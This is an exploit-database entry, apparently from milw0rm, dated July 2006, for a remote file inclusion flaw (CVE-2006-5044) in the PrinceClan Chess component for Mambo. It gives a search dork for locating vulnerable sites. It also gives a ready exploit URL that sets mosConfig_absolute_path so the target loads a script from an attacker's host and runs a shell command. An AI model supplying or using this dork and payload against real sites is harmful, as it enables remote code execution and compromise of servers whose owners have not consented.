Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion

Related Vulnerabilities: CVE-2006-5044  
Publish Date: 24 Jul 2006
Author: OLiBekaS
                							

                # pc_chess Component

- dork : index.php?option=com_pcchess

- exploit :

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls 

# milw0rm.com [2006-07-24]